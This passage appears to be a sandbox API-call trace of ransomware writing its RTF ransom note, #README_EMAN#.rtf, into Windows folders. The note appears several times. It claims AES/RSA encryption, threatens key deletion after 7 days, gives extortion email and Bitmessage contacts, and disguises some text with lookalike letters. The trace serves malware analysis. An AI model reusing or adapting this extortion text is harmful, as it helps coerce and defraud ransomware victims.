Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0262.641] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0262.641] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0262.642] CloseHandle (hObject=0x2c8) returned 1 [0262.642] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\#readme_eman#.rtf")) returned 0xffffffff [0262.642] GetLastError () returned 0x2 [0262.642] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0262.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 